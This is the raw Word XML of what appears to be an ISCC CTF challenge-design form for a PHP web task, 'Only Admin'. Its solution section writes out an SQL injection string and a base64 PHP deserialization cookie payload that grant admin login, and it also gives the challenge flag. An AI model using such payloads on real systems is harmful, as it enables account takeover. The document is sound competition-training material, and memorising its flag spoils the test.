          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iscc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2016@163.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="870" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:bookmarkEnd w:id="8"/>
    <w:bookmarkEnd w:id="9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc454094901"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>设计思路</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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【介绍题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>背景、特点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>、考察选手哪些方面的能力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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>考察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>代码审计能力，在过滤方案中找出缺陷，发现并利用反序列化登入任意用户账号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc454094905"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>关键技术及解决方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/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4" w:name="_Toc454094906"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>关键技术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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【介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>解答题目需要掌握哪些技术，以及这些技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>的时代背景】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
      </w:pPr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5" w:name="_Toc454094907"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>解决方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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【介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>题目的解题思路</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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首先扫描发现有web.tar.gz 源码泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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源代码审计后发现escape函数对参数类型判断有缺陷，没有判断参数是类的情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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记住密码功能处存在反序列化漏洞，构造反序列化，登陆时代入cookie，造成注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc454094908"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目名称及描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/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7" w:name="_Toc454094909"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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【给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>设定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>一个名称，尽量控制在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>10个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>（word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>）以内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>中英文不限】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Only Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
      </w:pPr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8" w:name="_Toc454094910"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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【题目描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>作为给参赛选手</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>提示，文字风格可以幽默点（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>可以参照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>其他CTF比赛的题目描述风格）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0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>听说只有admin可以看到flag？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc454094911"/>
      <w:r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部署方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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【分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>三种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>题型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>1、提供附件给选手下载；2、部署在服务器上，分步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>给出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>的部署过程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>附带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>每一步的截图和详细的文字说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>；3、不需要附件或服务器】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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部署在服务器上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>安装apache/nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>安装php、mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>解压题目到web根目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>，导入数据库install.sql</w:t>
      </w:r>
      <w:bookmarkStart w:id="31" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>修改config.php中相关变量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="clear" w:pos="425"/>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274945" cy="161544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tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="clear" w:pos="425"/>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5. 访问测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc454094912"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>过关流程及过关标志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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【分步骤详细说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>解题过程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>附带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>每一步的截图，题目测试人员能够按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>本小节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>所提供的解题过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>成功复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>解题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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扫描web根目录，发现有web.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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下载源代码审计，发现只要以管理员身份登陆即可获取flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="clear" w:pos="425"/>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="634365"/>
            <wp:effectExtent l="0" t="0" r="381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发现阅读消息处有xss，但是cookie是Httponly，xss无法利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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登陆函数，和过滤函数如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="clear" w:pos="425"/>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="297497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tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="clear" w:pos="425"/>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4905375" cy="4143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ab/>
      </w:r>
      <w:r>
        <w:t>4. 发现过滤函数没有判断参数是类，记住密码功能存在注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>通读代码，找到可利用的类Message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="clear" w:pos="425"/>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5086350" cy="396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ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>构造注入语句，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>' union select 1,'admin',1,1#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>，构造反序列化字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>构造payload YToyOntzOjg6InBhc3N3b3JkIjtzOjExOiJ0ZXN0QHFxLmNvbSI7czo1OiJlbWFpbCI7Tzo3OiJNZXNzYWdlIjo0OntzOjM6Im1zZyI7czoyOToiJyB1bmlvbiBzZWxlY3QgMSwnYWRtaW4nLDEsMSMiO3M6NDoiZnJvbSI7czoxOiIxIjtzOjI6InRvIjtzOjE6IjIiO3M6MjoiaWQiO2k6LTE7fX0=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Cookie打过去获取flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc454094913"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>硬件使用及网络拓补</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc82804672"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>【如果题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>需要其他硬件支持，请在这里列出硬件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>及数量；如果题目网络存在多个节点，请给出题目的网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>拓扑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>图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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc454094914"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>相关问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkEnd w:id="22"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc454094915"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目分值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>题目难度满分为500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>每50分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>一档、共</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>10档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>。请给出你对题目难度的评分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0分</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc454094916"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>题目F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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【给出题目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>修改flag的方法】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>在config.php里修改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3676650" cy="552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flag{UnSer1ali2e1sInt4rt1n9}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc454094917"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>竞赛阶段服务器端监控方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26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【如果需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>监控服务器，请给出监控方法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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc454094918"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>须注意的问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27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【介绍部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>题目、解题过程需要注意的一些问题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  <w:r>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>Web根目录的源码打包文件请勿删除，是给解题者用以审计的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc454094919"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>附件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc450547263"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>附件1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
